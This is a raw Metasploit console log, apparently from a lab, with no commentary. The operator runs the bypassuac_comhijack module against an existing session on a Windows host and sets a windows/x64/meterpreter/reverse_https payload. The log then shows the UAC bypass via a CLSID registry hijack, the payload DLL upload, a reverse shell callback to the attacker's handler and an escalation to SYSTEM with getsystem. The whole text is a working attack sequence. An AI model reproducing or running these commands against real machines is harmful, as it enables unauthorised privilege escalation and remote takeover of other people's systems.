msf exploit(handler) > use exploit/windows/local/bypassuac_comhijack msf exploit(bypassuac_comhijack) > set session 1 session => 1 msf exploit(bypassuac_comhijack) > set payload windows/x64/meterpreter/reverse_https payload => windows/x64/meterpreter/reverse_https msf exploit(bypassuac_comhijack) > run
[*] Started HTTPS reverse handler on https://192.168.107.145:6666 [*] UAC is Enabled, checking level... [+] Part of Administrators group! Continuing... [+] UAC is set to Default [+] BypassUAC can bypass this setting, continuing... [*] Targeting Computer Managment via HKCU\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931} ... [*] Uploading payload to C:\Users\Hu3sky\AppData\Local\Temp\BgTSfENK.dll ... [*] Executing high integrity process ... [*] https://192.168.107.145:6666 handling request from 192.168.107.144; (UUID: tpdt4wve) Staging x64 payload (206423 bytes) ... [*] Meterpreter session 5 opened (192.168.107.145:6666 -> 192.168.107.144:51040) at 2019-05-13 22:12:58 +0800 [+] Deleted C:\Users\Hu3sky\AppData\Local\Temp\BgTSfENK.dll [*] Cleaining up registry ...
meterpreter > getsystem ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin))